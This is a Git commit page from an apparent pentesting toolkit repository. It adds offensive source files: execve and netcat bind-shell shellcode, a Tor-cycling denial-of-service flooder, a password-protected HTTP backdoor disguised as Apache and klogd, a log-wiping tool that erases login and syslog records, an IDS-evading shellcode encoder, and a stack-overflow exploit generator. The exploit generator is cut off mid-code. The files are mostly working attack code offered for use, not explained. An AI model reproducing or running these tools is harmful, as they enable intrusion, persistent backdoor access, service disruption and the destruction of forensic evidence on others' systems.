Git-Mirrors/sec-pentesting-toolkit
1
0
Fork 0
mirror of https://github.com/autistic-symposium/sec-pentesting-toolkit.git synced 2025-05-02 14:56:10 -04:00
Code Issues Projects Releases Packages Wiki Activity

docs: Clean up resources for Hackoctoberfest 2019 (#41)

Browse source 
* Clean up resources for Hackoctoberfest 2019

* 👩🏾‍🦱 Add cloud hacking readme
This commit is contained in:
Mia von Steinkirch 2019-10-29 18:41:32 -07:00 committed by GitHub
parent 746d808fc0
commit 9ed0254149
458 changed files with 9658 additions and 57 deletions
Download patch file Download diff file Expand all files Collapse all files

1
Vulnerabilities_and_Exploits/Memory_Exploits/Assembly/RUNNING_ASM.sh Normal file
View file

@ -0,0 +1 @@
nasm shellspawn.asm

10
Vulnerabilities_and_Exploits/Memory_Exploits/Assembly/asm_compiler.sh Normal file
View file

@ -0,0 +1,10 @@
#!/bin/bash
if [ $# -ne 1 ]
then
printf "\n\tUsage: $0 filename\n\n"
exit
fi
filename=`echo $1 | sed s/"\$"//`
nasm -f elf $filename.asm && ld $filename.o -o $filename
echo "Successfully compiled."

19
Vulnerabilities_and_Exploits/Memory_Exploits/Assembly/get_shell.asm Normal file
View file

@ -0,0 +1,19 @@
;Universal Shellcode for Unix/Linux
section .text ; Text section
global _start ; Define _start function
_start: ; _start function
xor eax, eax ; Zero out eax REGister
xor ebx, ebx ; Zero out ebx REGister
xor ecx, ecx ; Zero out ecx REGister
cdq ; Zero out edx using the sign bit from eax
push ecx ; Insert 4 byte null in stack
push 0x68732f6e ; Insert /bin in the stack
push 0x69622f2f ; Insert //sh in the stack
mov ebx, esp ; Put /bin//sh in stack
push ecx ; Put 4 Byte in stack
push ebx ; Put ebx in stack
mov ecx, esp ; Insert ebx address in ecx
xor eax, eax ; Zero out eax register
mov al, 11 ; Insert __NR_execve 11 syscall
int 0x80 ; Syscall execute

29
Vulnerabilities_and_Exploits/Memory_Exploits/Assembly/netcat_backdoor.asm Normal file
View file

@ -0,0 +1,29 @@
;netcat backdoor to inject as a shellcode
jmp short todo
shellcode:
xor eax, eax ; Zero out eax
xor ebx, ebx ; Zero out ebx
xor ecx, ecx ; Zero out ecx
xor edx, edx ; Zero out edx using the sign bit from eax
mov BYTE al, 0xa4 ; setresuid syscall 164 (0xa4)
int 0x80 ; syscall execute
pop esi ; esi contain the string in db
xor eax, eax ; Zero out eax
mov[esi + 7], al ; null terminate /bin/nc
mov[esi + 16], al ; null terminate -lvp90
mov[esi + 26], al ; null terminate -e/bin/sh
mov[esi + 27], esi ; store address of /bin/nc in AAAA
lea ebx, [esi + 8] ; load address of -lvp90 into ebx
mov[esi +31], ebx ; store address of -lvp90 in BBB taken from ebx
lea ebx, [esi + 17] ; load address of -e/bin/sh into ebx
mov[esi + 35], ebx ; store address of -e/bin/sh in CCCC taken from ebx
mov[esi + 39], eax ; Zero out DDDD
mov al, 11 ; 11 is execve syscakk number
mov ebx, esi ; store address of /bin/nc
lea ecx, [esi + 27] ; load address of ptr to argv[] array
lea edx, [esi + 39] ; envp[] NULL
int 0x80 ; syscall execute
todo:
call shellcode
db '/bin/nc#-lvp9999#-e/bin/sh#AAAABBBBCCCCDDDD'
; 0123456789012345678901234567890123456789012

1
Vulnerabilities_and_Exploits/Memory_Exploits/Assembly/shellspawn Normal file
View file

@ -0,0 +1 @@
1ÀPh//shh/bin‰ãP‰âP‰á° Í€

14
Vulnerabilities_and_Exploits/Memory_Exploits/Assembly/shellspawn.asm Normal file
View file

@ -0,0 +1,14 @@
BITS 32
xor eax, eax ; zero eax
push eax ; null terminate the string
push 0x68732f2f ; push //sh (// is same as / for our purpose)
push 0x6e69622f ; push /bin
mov ebx, esp ; pass first argument using ebx
push eax ; third argument is empty
mov edx, esp
push eax ; second argument is empty
mov ecx, esp
mov al, 11 ; execve is system call #11
int 0x80 ; issue an interrupt

1035
Vulnerabilities_and_Exploits/Memory_Exploits/Buffer_overflows/stack_overflow_narnia.md Normal file
View file

File diff suppressed because it is too large Load diff

10
Vulnerabilities_and_Exploits/Memory_Exploits/C-codes/crawl_passwd_file.c Normal file
View file

@ -0,0 +1,10 @@
#include <pwd.h>
int main()
{
struct passwd *p;
while(
p=getpwent())
printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name,p->pw_passwd,
p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell);
}

107
Vulnerabilities_and_Exploits/Memory_Exploits/C-codes/dos_tool.c Normal file
View file

@ -0,0 +1,107 @@
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <netdb.h>
#include <signal.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
int make_socket(char *host, char *port) {
struct addrinfo hints, *servinfo, *p;
int sock, r;
// fprintf(stderr, "[Connecting -> %s:%s\n", host, port);
memset(&hints, 0, sizeof(hints));
hints.ai_family = AF_UNSPEC;
hints.ai_socktype = SOCK_STREAM;
if((r=getaddrinfo(host, port, &hints, &servinfo))!=0) {
fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(r));
exit(0);
}
for(p = servinfo; p != NULL; p = p->ai_next) {
if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) {
continue;
}
if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) {
close(sock);
continue;
}
break;
}
if(p == NULL) {
if(servinfo)
freeaddrinfo(servinfo);
fprintf(stderr, "No connection could be made\n");
exit(0);
}
if(servinfo)
freeaddrinfo(servinfo);
fprintf(stderr, "[Connected -> %s:%s]\n", host, port);
return sock;
}
void broke(int s) {
// do nothing
}
#define CONNECTIONS 8
#define THREADS 48
void attack(char *host, char *port, int id) {
int sockets[CONNECTIONS];
int x, g=1, r;
for(x=0; x!= CONNECTIONS; x++)
sockets[x]=0;
signal(SIGPIPE, &broke);
while(1) {
for(x=0; x != CONNECTIONS; x++) {
if(sockets[x] == 0)
sockets[x] = make_socket(host, port);
r=write(sockets[x], "\0", 1);
if(r == -1) {
close(sockets[x]);
sockets[x] = make_socket(host, port);
} else
// fprintf(stderr, "Socket[%i->%i] -> %i\n", x, sockets[x], r);
fprintf(stderr, "[%i: Voly Sent]\n", id);
}
fprintf(stderr, "[%i: Voly Sent]\n", id);
usleep(300000);
}
}
void cycle_identity() {
int r;
int socket = make_socket("localhost", "9050");
write(socket, "AUTHENTICATE \"\"\n", 16);
while(1) {
r=write(socket, "signal NEWNYM\n\x00", 16);
fprintf(stderr, "[%i: cycle_identity -> signal NEWNYM\n", r);
usleep(300000);
}
}
int main(int argc, char **argv) {
int x;
if(argc !=3)
cycle_identity();
for(x=0; x != THREADS; x++) {
if(fork())
attack(argv[1], argv[2], x);
usleep(200000);
}
getc(stdin);
return 0;
}

8
Vulnerabilities_and_Exploits/Memory_Exploits/C-codes/get_stack_pointer.c Normal file
View file

@ -0,0 +1,8 @@
/* Get stack pointer of the system(Unix/Linux) */
#iclude <stdio.h>
unsigned long get_sp(void) {
__asm__("movl %esp,%eax");
}
void main() {
printf("0x%x\n", get_sp());
}

12
Vulnerabilities_and_Exploits/Memory_Exploits/C-codes/getshadd.c Normal file
View file

@ -0,0 +1,12 @@
// usage: ./getshadd ENVVAR BINARY
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc,char *argv[]){
char *ptr;
ptr=getenv(argv[1]);
ptr+=(strlen(argv[0])-strlen(argv[2]))*2;
printf("%s will be at %p\n",argv[1],ptr);
return 0;
}

129
Vulnerabilities_and_Exploits/Memory_Exploits/C-codes/http_backdoor.c Normal file
View file

@ -0,0 +1,129 @@
#define _XOPEN_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <signal.h>
#include <string.h>
#define DEFAULT_PORT 8080
/* des crypted password */
#define PWD "QXtGlGiFUEeKY"
void sig_hand(int sig) {
int status;
/* rip off children */
while(waitpid(-1,&status,WNOHANG)>0);
}
/* we hide ourselves as httpd daemon */
char *erro=
"HTTP/1.1 404 Not Found\n"
"Date: Mon, 08 Dec 1998 23:17:15 GMT\n"
"Server: Apache/1.3.X (Unix)\n"
"Connection: close\n"
"Content-Type: text/html\n\n"
"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n"
"<HTML><HEAD>\n"
"<TITLE>404 Not Found</TITLE>\n"
"</HEAD><BODY>\n"
"<H1>Not Found</H1>\n"
"The requested URL /loha was not found on this server.<P>\n"
"<HR>\n"
"<ADDRESS>Apache/1.3.X Server at yourserver Port 80</ADDRESS>\n"
"</BODY></HTML>\n";
void my_error(int fd) {
write(fd,erro,strlen(erro));
}
int main(int argc,char **argv)
{
char *name[3];
char *env[2];
char *execname;
int fd,fd2,fromlen;
int port;
struct sockaddr_in serv;
char *crypted=PWD;
unsigned char *ptr;
char pass[9];
port=DEFAULT_PORT;
if (argc>1 && atoi(argv[1])) port=atoi(argv[1]);
#ifndef DEBUG
if (fork()) exit(1);
close(0);
close(1);
close(2);
chdir("/");
setsid();
#endif
signal(SIGCHLD,sig_hand);
if((fd=socket(AF_INET,SOCK_STREAM,0))<0) {
#ifdef DEBUG
perror("socket");
#endif
exit(1);
}
serv.sin_addr.s_addr=0;
serv.sin_port=htons(port);
serv.sin_family=AF_INET;
if(bind(fd,(struct sockaddr *)&serv,16)) {
#ifdef DEBUG
perror("bind");
#endif
exit(1);
}
if(listen(fd,5)) {
#ifdef DEBUG
perror("listen");
exit(1);
#endif
}
for(;;) {
fromlen=16; /*(sizeof(struct sockaddr)*/
fd2=accept(fd,(struct sockaddr *)&serv,&fromlen);
if (fd2<0) continue;
if (fork()) { /* parent */
close(fd2);
} else {
close(fd);
bzero(pass,9);
read(fd2,pass,8);
for(ptr=pass;*ptr!=0;ptr++)
if(*ptr<32) *ptr=0;
if (strcmp(crypt(pass,crypted),crypted)) {
my_error(fd2);
exit(1);
}
dup2(fd2,0);
dup2(fd2,1);
dup2(fd2,2);
execname="/bin/sh";
name[0]="/sbin/klogd";
/* gives somewhat nicer appearence */
name[1]="-i";
name[2]=NULL;
/* if the actual /bin/sh is bash
* we need this to get rid saving stuff into
* .bash_history file
*/
env[0]="HISTFILE=/dev/null";
env[1]=NULL;
execve(name[0],name,env);
exit(1);
}
}
}

201
Vulnerabilities_and_Exploits/Memory_Exploits/C-codes/leave_no_log.c Normal file
View file

@ -0,0 +1,201 @@
/* Leave no logs */
/***************************************************************************
vanish.c - description
-------------------
begin : Wed Feb 2 2000
copyright : (C) 2000 by Neo the Hacker
email : --------------------------
***************************************************************************/
/***************************************************************************
* Vanish.c cleans WTMP, UTMP, lastlog, messages, secure, xferlog, maillog, *
* warn, mail, httpd.access_log, httpd.error_log. Use your brain, check your*
* logs and edit accordingly !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!*
****************************************************************************
* Warning!! This programm is for educational purpouse only! I am not *
* responsible to anything you do with this !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!*
****************************************************************************
* Code written for Unix like systems! Tested on SuSE-Linux 6.2 ! *
* Compile like: gcc vanish.c -o vanish *
***************************************************************************/
#include <stdio.h>
#include <fcntl.h>
#include <utmp.h>
#include <sys/types.h>
#include <unistd.h>
#include <lastlog.h>
#include <pwd.h>
#define UTMP "/var/run/utmp"
#define WTMP "/var/log/wtmp"
#define LASTLOG "/var/log/lastlog"
#define MESSAGES "/var/log/messages"
#define SECURE "/var/log/secure"
#define XFERLOG "/var/log/xferlog"
#define MAILLOG "/var/log/maillog"
#define WARN "/var/log/warn"
#define MAIL "/var/log/mail"
#define HTTPDA "/var/log/httpd.access_log"
#define HTTPDE "/var/log/httpd.error_log"
#define MAXBUFF 8*1024
int main(int argc, char *argv[])
{
struct utmp ut ;
struct lastlog ll ;
struct passwd *pass ;
int i, size, fin, fout ;
FILE *pfile;
FILE *pfile2;
char *varlogs[] = {MESSAGES, SECURE, XFERLOG, MAILLOG, WARN, MAIL, HTTPDA,HTTPDE} ;
char *newlogs[] = {"messages.hm", "secure.hm","xferlog.hm","maillog.hm","warn.hm",
"mail.hm", "httpda.hm", "httpde.hm"} ;
char buffer[MAXBUFF] ;
char user[10] ;
char host[100] ;
char host_ip[17] ;
/*Usage of the programm*/
if (argc!=4)
{
printf ("\n\n");
fprintf(stderr, "Vanish by Neo the Hacker\n");
fprintf(stderr, "Usage: %s <user> <host> <IP>\n\n",argv[0]) ;
exit () ;
}
/***************************
* OK Let's start with UTMP *
***************************/
size = sizeof(ut) ;
strcpy (user, argv[1]) ;
fin = open (UTMP, O_RDWR) ;
if (fin < 0)
{
fprintf(stderr, "\nFucking shit!! Utmp permission denied.Getting outta here!!\n");
close (fin) ;
exit();
}
else
{
while (read (fin, &ut, size) == size) {
if (!strncmp(ut.ut_user, user, strlen(user))) {
memset(&ut, 0, size);
lseek(fin, -1*size, SEEK_CUR);
write (fin, &ut, size);
}
}
close (fin);
printf("\nutmp target processed.");
}
/***************************
* OK Let's go on with WTMP *
***************************/
strcpy (host, argv[2]) ;
strcpy(host_ip, argv[3]) ;
fin = open(WTMP, O_RDONLY) ;
if (fin < 0) {
fprintf(stderr, "\nFucking shit!! Wtmp permission denied.Getting outta here.\n") ;
close (fin) ; exit () ;
}
fout = open("wtmp.hm", O_WRONLY|O_CREAT) ;
if (fout < 0) {
fprintf(stderr, "\nDamn! Problems targeting wtmp. Getting outta here.\n") ;
close (fout) ;
exit () ;
}
else {
while (read (fin, &ut, size) == size) {
if ( (!strcmp(ut.ut_user, user)) || (!strncmp(ut.ut_host, host, strlen(host))) ) {
/* let it go into oblivion */ ;
}
else write (fout, &ut, size) ; }
close (fin) ;
close (fout) ;
if ((system("/bin/mv wtmp.hm /var/log/wtmp") < 0) &&
(system("/bin/mv wtmp.hm /var/log/wtmp") == 127)) {
fprintf(stderr, "\nAch. Couldn't replace %s .", WTMP) ;
}
system("/bin/chmod 644 /var/log/wtmp") ;
printf("\nwtmp target processed.") ;
}
/***************************
* OK Let's look at LASTLOG *
***************************/
size = sizeof(ll) ;
fin = open(LASTLOG, O_RDWR) ;
if (fin < 0) {
fprintf(stderr, "\nFucking shit!! Lastlog permission denied.Getting outta here.\n") ;
close (fin) ;
exit () ;
}
else {
pass = getpwnam(user) ;
lseek(fin, size*pass->pw_uid, SEEK_SET) ;
read(fin, &ll, size) ;
ll.ll_time = 0 ;
strncpy (ll.ll_line, " ", 5) ;
strcpy (ll.ll_host, " ") ;
lseek(fin, size*pass->pw_uid, SEEK_SET) ;
write(fin, &ll, size) ;
close (fin) ;
printf("\nlastlog target processed.\n") ;
}
/**************************
* OK moving to /var .... *
**************************/
i=0;
while (i<8) {
printf("Processing %s\t", varlogs[i]) ;
pfile = fopen (varlogs[i],"r");
if (!pfile)
{
printf("Couldn't open %s\n\n", varlogs[i]);
i++;
continue ;
}
pfile2 = fopen (newlogs[i],"w");
if (!pfile2)
{
printf("Couldn't create backup file!
You have to have write permission to the folder!! %s \n\n", newlogs[i]);
i++;
continue;
}
else {
while (fgets(buffer, MAXBUFF, pfile) != NULL) {
if ((!strstr(buffer, user)) && (!strstr(buffer, host))&&(!strstr(buffer, host_ip))) {
fputs(buffer,pfile2) ; } }
}
fclose (pfile);
fclose (pfile2);
printf (" DONE.\n");
i++;
}
printf ("\n\n");
system ("mv messages.hm /var/log/messages");
system ("mv secure.hm /var/log/secure");
system ("mv xferlog.hm /var/log/xferlog");
system ("mv maillog.hm /var/log/maillog");
system ("mv warn.hm /var/log/warn");
system ("mv mail.hm /var/log/mail");
system ("mv httpda.hm /var/log/httpd.access_log");
system ("mv httpde.hm /var/log/httpd.error_log");
printf ("\n\n");
printf ("V_A_N_I_S_H_E_D_!\n");
printf ("Your tracks have been removed\n");
printf ("Exiting programm !!\n\n");
exit();
}

168
Vulnerabilities_and_Exploits/Memory_Exploits/C-codes/md5_xor.c Normal file
View file

@ -0,0 +1,168 @@
/*
* 0x333crypt <= MD5 & xor
*
* process:
*
* xor1 -> | mainkey in MD5 | 32 chars plain text readed by file
* xor2 -> | subkey1 in MD5 | 32 chars plain text readed by file
* xor3 -> | subkey2 in MD5 | 32 chars plain text readed by file
*
* etc etc..
*
* based on subkey generation in base a mainkey specified by user.
* key isn't written in file.
*
* coded by nsn
*
* developed and tested on linux slackware
* gcc -lssl source.c -o out
*
* ~ www.0x333.org ~
*
*/
#include <stdio.h>
#include <openssl/md5.h>
#include <string.h>
#include <unistd.h>
/* constants, variables and prototipes */
#define VERSION "0.5"
#define PASSLEN 128
typedef enum {FALSE,TRUE} BOOLEAN;
static char *MDString(char *string);
char xor(char, char); /* make xor between two chars and return result */
void help(char *); /* prints help for user. */
void gen(char *, char *, char *, BOOLEAN);
char *mainkey = NULL; /* can be changed with option -k */
char *infile = NULL; /* can be changed with option -i */
char *outfile = NULL; /* can be changed with option -o */
BOOLEAN operation = TRUE;
/* functions source codes */
char xor(char a, char b) { return a^b; }
static char
*MDString (char *string)
{
static char ret[33]={"\0"}, hex[2];
unsigned char digest[16];
unsigned int len = strlen(string), i;
MD5_CTX context;
MD5_Init(&context);
MD5_Update(&context, string, len);
MD5_Final(digest, &context);
for (i = 0; i < 16; ++i) {
sprintf(hex,"%02x", digest[i]);
strcat(ret,hex);
}
return ret;
}
void
usage (char *prg)
{
fprintf (stderr, "\n [~] 0x333crypt %s <= files with a key [~]\n",VERSION);
fprintf (stderr, " [~] coded by nsn of 0utSid3rs [~]\n\n");
fprintf (stderr, " Usage: %s [ -k password ] [-e/d ] [ -i infile ] [-o outfile] [ -h ]\n\n", prg);
fprintf (stderr, " \t-k = key for encrypt/decrypt [ lentgh <= %d ]\n",PASSLEN);
fprintf (stderr, " \t-e/d = operation encrypt/decrypt\n");
fprintf (stderr, " \t-i = infile\n");
fprintf (stderr, " \t-o = outfile\n");
fprintf (stderr, " \t-h = show this help\n\n");
exit(-333);
}
void
gen(char *infile, char *outfile, char *mainkey, BOOLEAN operation)
{
FILE *instream = NULL, *outstream = NULL;
unsigned long int subkeyscounter = 1;
static char *hashMD5, tempkey[1024]={"\0"}, data[33]={"\0"}, byte;
unsigned short int i = 0;
size_t len;
if (!(instream = fopen(infile,"rb")) || (!(outstream = fopen(outfile,"wb"))))
printf("\n[*] error in opening %s or %s aborting!\n",infile,outfile);
else {
memset(data,0,sizeof(data));
memset(tempkey,0,sizeof(tempkey));
hashMD5 = (char *)alloca(sizeof(data));
memset(hashMD5,0,sizeof(hashMD5));
printf("\n[*] reading data... wait pls\n\n");
/* reading all chars of file */
while ((len = fread(&data[i++], 1, 32,instream)))
{
strcpy(tempkey,mainkey);
sprintf(tempkey,"%s%d",mainkey,subkeyscounter);
hashMD5 = MDString(tempkey);
++subkeyscounter;
/* xor subkey and plain text i,j */
for (i = 0; i < len; ++i)
{
byte = data[i];
if ((data[i] != hashMD5[i]) && (data[i] != 0))
byte = ((operation) ? xor(hashMD5[i],data[i]) : xor(data[i],hashMD5[i]));
fwrite(&byte,1,1,outstream);
}
i = 0;
memset(data,0,sizeof(data));
memset(tempkey,0,sizeof(tempkey));
memset(hashMD5,0,sizeof(hashMD5));
}
printf("\n[*] work completed.\n[*] file generated with %d subkeys.\n",subkeyscounter);
fclose(instream);
fclose(outstream);
}
}
int
main (int argc, char **argv)
{
int c;
while (( c = getopt (argc,argv,"edh:k:i:o:")) != EOF)
{
switch(c)
{
case 'e' : operation = TRUE;break;
case 'd' : operation = FALSE;break;
case 'k' : mainkey = optarg;break;
case 'i' : infile = optarg;break;
case 'o' : outfile = optarg;break;
case 'h' : usage(argv[0]);break;
default :
usage( argv[0] );
}
}
if ( argc != 8 ) { usage ( argv[0] ); }
if (strlen(mainkey) <= PASSLEN)
gen(infile,outfile,mainkey,operation);
else
printf("Password have to be with length <= %d\n",PASSLEN);
return 0;
}

100
Vulnerabilities_and_Exploits/Memory_Exploits/C-codes/shellcode_encode.c Normal file
View file

@ -0,0 +1,100 @@
#include <stdlib.h>
#include <string.h>
/*
* Shellcode encoder 0.1 by zillion (safemode.org)
*
* Wish list :
* -----------
*
* - Make the decoder polymorphic
* - Add OS detection (see safemode)
*
* How to use it :
* ---------------
*
* Replace the shellcode with any shellcode, compile this file
* and execute it. The decoder is OS independent and can thus be
* used for any OS on Intel. The purpose:
*
* - Lower chance of IDS detection
* - Counter difficult characters
* - Confuse sans students ;-)
*
* The decoder :
* -------------
*
* jmp short go
* next:
*
* pop esi
* xor ecx,ecx
* mov cl,11
* change:
* sub byte [esi + ecx - 1 ],11
* sub cl, 1
* jnz change
* jmp short ok
* go:
* call next
* ok:
* <shellcode comes here>
*
*/
void execute(char * data);
int main() {
char decoder[] =
"\xeb\x11\x5e\x31\xc9\xb1\x00\x80\x6c\x0e\xff\x00\x80\xe9\x01"
"\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff";
char shellcode[] =
"\xeb\x0e\x5e\x31\xc0\x88\x46\x07\x50\x50\x56\xb0\x3b\x50\xcd"
"\x80\xe8\xed\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23";
char tmp;
char *end;
int size = 53;
int i;
int l = 15;
for(i=0;i<strlen(shellcode);i++) {
shellcode[i] += size;
}
decoder[6] += strlen(shellcode);
decoder[11] += size;
end = (char *) malloc(strlen(shellcode) + strlen(decoder));
strcat(end,decoder);
strcat(end,shellcode);
printf("\n\nchar shellcode[] =\n");
for(i = 0; i < strlen(end); ++i) {
if(l >= 15) {
if(i) printf("\"\n");
printf( "\t\"");
l = 0;
}
++l;
printf("\\x%02x", ((unsigned char *)end)[i]);
}
execute(end);
free(end);
}
void execute(char *data) {
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int)data;
}

371
Vulnerabilities_and_Exploits/Memory_Exploits/C-codes/stack_overflow_generator.c Normal file
View file

@ -0,0 +1,371 @@
/* 0x333xes => stack overflow exploit generator
*
* simple stack overflow exploit generator, that permits
* you to generate a -working- exploit source code. to make
* your exploit correctly works, 'xes' try to automatically
* find the correct ret address
*
* coded by c0wboy
*
* ~ www.0x333.org ~
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <getopt.h>
#define VERSION "0.3"
#define EXPLOIT "exploit.c"
#define TEST "xes" /* file created with test shellcode */
#define XES_std 0xbffff300 /* address we start from to search for RET */
#define XES_env 0xbfffe0ff /* that is not really true ... but by testing
* i found some ENV located there ...
*/
#define MAX_LENGHT 10240 /* max buffer-lenght to exploit */
#define MAX_EVIL 1337 /* max ret-buffer lenght */
#define MAX 4 /* max shellcodes supported */
#define fatal(x...) { fprintf (stderr, ##x); exit(-333); }
#define offset(x) 0xbfffffff - x
typedef struct {
char * sh_name;
char * sh_type;
} sharkode;
sharkode shark[] = {
{
" \"touch xes\" shellcode [-test only-]",
"unsigned char test[] =\n\t"
"\"\\xeb\\x30\\x5e\\x89\\x76\\x16\\x31\\xc0\\x88\"\n\t"
"\"\\x46\\x08\\x88\\x46\\x0b\\x88\\x46\\x15\\x89\"\n\t"
"\"\\x46\\x22\\xb0\\x0b\\x8d\\x5e\\x09\\x89\\x5e\"\n\t"
"\"\\x1a\\x8d\\x5e\\x0c\\x89\\x5e\\x1e\\x89\\xf3\"\n\t"
"\"\\x8d\\x4e\\x16\\x8d\\x56\\x22\\xcd\\x80\\x31\"\n\t"
"\"\\xc0\\xb0\\x01\\xcd\\x80\\xe8\\xcb\\xff\\xff\"\n\t"
"\"\\xff\\x2f\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\"\n\t"
"\"\\x20\\x2d\\x63\\x20\\x74\\x6f\\x75\\x63\\x68\"\n\t"
"\"\\x20\\x78\\x65\\x73\";"
},
{
" execve(/bin/sh); [linux]",
"unsigned char sharkode[] =\n\t"
"\"\\x31\\xc0\\x50\\x68\\x6e\\x2f\\x73\\x68\\x68\"\n\t"
"\"\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x99\\x52\\x53\"\n\t"
"\"\\x89\\xe1\\xb0\\x0b\\xcd\\x80\";"
},
{
" execve(/bin/sh); [*BSD]",
"unsigned char sharkode[] =\n\t"
"\"\\x31\\xc0\\x50\\x68\\x6e\\x2f\\x73\\x68\\x68\"\n\t"
"\"\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x50\\x54\\x53\"\n\t"
"\"\\x50\\xb0\\x3b\\xcd\\x80\";"
},
{
" setreuid(0,0) shellcode",
"unsigned char sharkode[] =\n\t"
"\"\\x31\\xc0\\x31\\xdb\\x31\\xc9\\xb0\\x46\\xcd\"\n\t"
"\"\\x80\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\"\n\t"
"\"\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x8d\\x54\"\n\t"
"\"\\x24\\x08\\x50\\x53\\x8d\\x0c\\x24\\xb0\\x0b\"\n\t"
"\"\\xcd\\x80\\x31\\xc0\\xb0\\x01\\xcd\\x80\";"
},
{ NULL, NULL },
};
int off = 0;
// prototypes
int main (int, char * []);
void usage (char *);
void shak_list (void);
unsigned long xes (int); /* find correct ret address */
void
usage (char * prg)
{
fprintf (stderr, "\n [~] 0x333xes => stack overflow exploit generator v%s [~]\n", VERSION);
fprintf (stderr, " [~] coded by c0wboy ~ www.0x333.org [~] \n\n");
fprintf (stderr, " Usage : %s [ -b binary ] [ -e environ ] [ -w switch ]", prg);
fprintf (stderr, " [ -s type ] [ -x ] [ -l lenght ] [ -o lenght ] [ -a align ] [ -h ]\n");
fprintf (stderr, "\n \t-b\tbugged binary\n");
fprintf (stderr, " \t-e\tset environ variable bugged\n");
fprintf (stderr, " \t-w\tset switch bugged\n");
fprintf (stderr, " \t-s\tshellcode type [0-%d]\n", MAX-1);
fprintf (stderr, " \t-x\tshellcode list\n");
fprintf (stderr, " \t-l\tbuffer lenght\n");
fprintf (stderr, " \t-o\tevil buffer (nop+shellcode) lenght (default 1337)\n");
fprintf (stderr, " \t-a\talign the buffer (try 1)\n");
fprintf (stderr, " \t-h\tdisplay this help\n\n");
exit (-333);
}
void
shak_list (void)
{
int list;
fprintf (stdout, "\n [~] Shellcode Types :\n");
fprintf (stdout, " --------------------- \n");
for (list = 0; shark[list].sh_name != NULL; ++list)
fprintf (stdout, " [%d] %s\n", list, shark[list].sh_name);
fprintf (stdout, "\n");
exit (-333);
}
unsigned long
xes (int hard)
{
int ret;
char wuffer[33];
unsigned long xes;
FILE * cya, * fd;
if (off)
xes=XES_env;
else
xes=XES_std;
for (ret=1 ; ret < (offset(xes)) ; ret++, xes++)
{
bzero (wuffer, 33);
sprintf (wuffer, "./exploit 0x%x", xes);
fprintf (stdout, " * testing 0x%x\n", xes);
if ((cya=popen (wuffer, "r")) == NULL)
fatal (" [-] Error in testing exploit ...\n\n");
if ((fd=fopen(TEST, "r")))
{
pclose(cya);
fclose(fd);
return (xes+ 0xdf);
}
pclose(cya);
}
if(!hard)
fprintf (stderr, " [~] ret address NOT found ..\n [~] we suppose :\n\n"
" [*] wrong buffer align\n [~] try to solve this problem ...\n");
return (0x333);
}
int
main (int argc, char * argv[])
{
int c, s=0, len=0, out=MAX_EVIL, step=0, align=0, hard=0;
char exe[100], *bin=NULL, *w=NULL, *env=NULL;
unsigned long ret_add;
FILE * fd;
while(( c = getopt (argc, argv, "xhb:e:w:s:l:o:a:")) != EOF)
{
switch(c)
{
case 'b' : bin = optarg; break;
case 'e' :
env = optarg;
off=1;
break;
case 'w' : w = optarg; break;
case 's' : /* shellcode types */
s = atoi(optarg);
if ((s<0) || (s>MAX-1))
usage (argv[0]);
break;
case 'x' : shak_list();
case 'l' :
len = atoi(optarg);
if (len>MAX_LENGHT)
fatal (" [-] explotable-buffer is too long\n");
break;
case 'o' :
out = atoi(optarg);
if (out>MAX_EVIL)
fatal (" [-] ret-buffer too long\n");
break;
case 'a' : align = atoi(optarg); break;
case 'h' : usage(argv[0]);
default : usage(argv[0]);
}
}
if ((!bin) || (!len) || ((env) && (w)))
usage(argv[0]);
fprintf (stdout, "\n [~] 0x333xes => stack flow exploit generator [~]\n");
fprintf (stdout, " [~] coded by c0wboy ~ www.0x333.org [~] \n\n");
fprintf (stdout, " [*] creating source code ...\n");
do_sploit : /* when ret is found, we re-write the exploit */
system ("rm -rf xes");
if((fd = fopen (EXPLOIT, "w")) == NULL)
fatal (" [-] Error in creating %s\n", EXPLOIT);
fprintf (fd, "/* Generated with 0x333xes ~ coded by c0wboy\n *");
fprintf (fd, "\n * ~ www.0x333.org ~\n *\n */ ");
/* setting header */
fprintf (fd, "\n#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\n");
fprintf (fd, "#include <string.h>\n\n#define BIN\t\"%s\"\n#define NOP\t0x90\n", bin);
fprintf (fd, "#define BUFFER\t%i\n", len);
if (!env)
fprintf (fd, "#define OUTSIDE\t%i\n", out);
if (hard)
align = 1;
if (!align)
fprintf (fd, "#define ALIGN\t0\n");
else
fprintf (fd, "#define ALIGN\t%d\n", align);
if (step)
fprintf (fd, "#define RET\t0x%x\n", ret_add);
/* setting shellcode */
if (step)
fprintf (fd, "\n\n%s\n", shark[s].sh_type);
else
fprintf (fd, "\n\n%s\n", shark[0].sh_type); /* test-shellcode */
/* setting main() */
if (step)
fprintf (fd, "int\nmain ()\n");
else
fprintf (fd, "int\nmain (int argc, char * argv[])\n");
if (env)
fprintf (fd, "{\n int x;\n char buf[BUFFER], *bufz;\n");
else
fprintf (fd, "{\n int x;\n char buf[BUFFER], out[OUTSIDE], *bufz;\n");
if (step)
fprintf (fd, " unsigned long ret_add = RET, *add_ptr ;\n\n");
else
fprintf (fd, " unsigned long ret_add, *add_ptr ;\n\n"
" if (argc != 2)\n exit (-333);\n\n"
